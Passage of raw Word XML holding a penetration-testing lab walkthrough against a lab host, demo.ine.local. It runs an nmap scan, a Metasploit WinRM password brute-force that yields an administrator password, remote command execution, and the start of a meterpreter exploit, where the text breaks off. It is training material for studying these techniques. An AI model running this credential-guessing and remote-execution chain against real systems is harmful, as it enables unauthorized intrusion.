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8F85" w14:textId="5E9A8DBB" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B68DA3" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">Instead of each Windows service having its own .exe, Windows groups them under </w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> to save memory and make management easier.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63648A3E" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0016682A">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2318592C" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">One svchost.exe may run the </w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Update service</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7821AEFE" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">Another svchost.exe may run the </w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS Client service</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A626EE" w14:textId="76306494" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> = the “container” process Windows uses to run background services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382C2A63" w14:textId="34A3CBC2" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1162F75A" w14:textId="1602DE2C" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19E5F73C" wp14:editId="16797BCA">
            <wp:extent cx="5943600" cy="3253740"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="821089923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F3F1" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> Run a Nmap scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58161986" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE13A0" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> --top-ports 7000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7CA3DB2E" w14:textId="69E7BA57" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E47AB0" wp14:editId="25D9A6F8">
            <wp:extent cx="5442230" cy="2248016"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1497964553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64553" name="Picture 17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6FCB" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> We have discovered that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> server is running on port 5985. By </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>default</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> service uses port 5985 for HTTP. We will run the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> module to find the valid users and their passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF990CB" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6734919D" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C31404" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64E3D171" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="12E6BCC9" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set USER_FILE /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>-framework/data/wordlists/common_users.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E5319A" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BACBED4" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set VERBOSE false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21BBB5" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set PASSWORD anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522AEFC9" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DD479" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> This will take around 2-3 minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630D19B8" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> We are setting the PASSWORD because in the recent version of the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>" module, the PASSWORD option is required unless using Kerberos authentication. Metasploit will still use the USERPASS_FILE file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A09A0A" w14:textId="33CEDC65" w:rsidR="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E9E144" wp14:editId="6BF492E4">
            <wp:extent cx="5740695" cy="3105310"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="766185176" name="Picture 18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85176" name="Picture 18" descr="A computer screen with text and imag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753F" w14:textId="7D2C92B1" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="001200CE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32048FD5" wp14:editId="3DEA1926">
            <wp:extent cx="5791498" cy="1886047"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1438345308" name="Picture 19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45308" name="Picture 19" descr="A screen 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EBDF" w14:textId="1594E406" w:rsidR="001200CE" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0BFC7946" wp14:editId="08732F50">
            <wp:extent cx="5899453" cy="933498"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="4672023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02323" name="Picture 4672023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453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3BE7" w14:textId="6D460778" w:rsidR="00E925FE" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3299751D" wp14:editId="3BC56650">
            <wp:extent cx="5772447" cy="1409772"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12506262" name="Picture 2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262" name="Picture 29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FC16" w14:textId="716F57DF" w:rsidR="00E925FE" w:rsidRDefault="00E925FE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="578AEBB0" wp14:editId="199EA8A9">
            <wp:extent cx="5213618" cy="1409772"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1731502829" name="Picture 3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02829" name="Picture 30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1E38" w14:textId="1EF2E940" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">We have found the valid password of the administrator user. Also, we got the command-shell session </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>opened</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> in the background. We'll further explore the other modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478E00BE" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> Checking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> supported authentication method using an auxiliary module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBF4DEB" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">This is very important to know, before we try to connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> service. We need to use a valid authentication method while connecting to the service. You can find more information about the authentication from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>below link</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>: https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D027F" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5789C" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_auth_methods</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0220D48A" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="408659C5" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2EB7C7" w14:textId="1C9B29AB" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="001200CE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="079A53F3" wp14:editId="63E795E3">
            <wp:extent cx="5791498" cy="3181514"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1126974957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4957" name="Picture 20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58E9" w14:textId="1FB8FD45" w:rsidR="001200CE" w:rsidRDefault="001200CE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D90035" wp14:editId="307E3D8A">
            <wp:extent cx="5785147" cy="1530429"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="1506029864" name="Picture 2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29864" name="Picture 21" descr="A screen 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3CA4" w14:textId="466E18DB" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">Target supports two authentication types </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> Basic and Negotiate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C100F" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> Execute command on the target server using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0D6EF" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A624D3E" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="483A02C3" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7488D85D" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set USERNAME administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E16CB5" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>tinkerbell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="23143E96" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set CMD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AB1CA5F" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AD7C18" w14:textId="42BD34F6" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="001200CE" w:rsidP="0016682A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FA5AA6A" wp14:editId="109E6213">
            <wp:extent cx="5829600" cy="2813195"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="5151799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799" name="Picture 22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FF86" w14:textId="6D3A0461" w:rsidR="001200CE" w:rsidRDefault="001200CE" w:rsidP="0016682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5C6E0F7" wp14:editId="43FAA904">
            <wp:extent cx="5867702" cy="2324219"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12555422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42248" name="Picture 12555422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4EEF" w14:textId="77777777" w:rsidR="001200CE" w:rsidRDefault="001200CE" w:rsidP="0016682A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="277E9FE7" w14:textId="0232D3A7" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="0016682A">
        <w:t> We have successfully executed the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">” on the remote server. Now, we will use the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_script_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> exploit module to get the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC92C12" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AC8F80" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>winrm_script_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E09D6A0" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4A7B89A6" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t>set USERNAME administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005C70C3" w14:textId="77777777" w:rsidR="0016682A" w:rsidRPr="0016682A" w:rsidRDefault="0016682A" w:rsidP="0016682A">
      <w:r w:rsidRPr="0016682A">
        <w:t xml:space="preserve">set PASSWORD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0016682A">
        <w:t>tinkerbell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
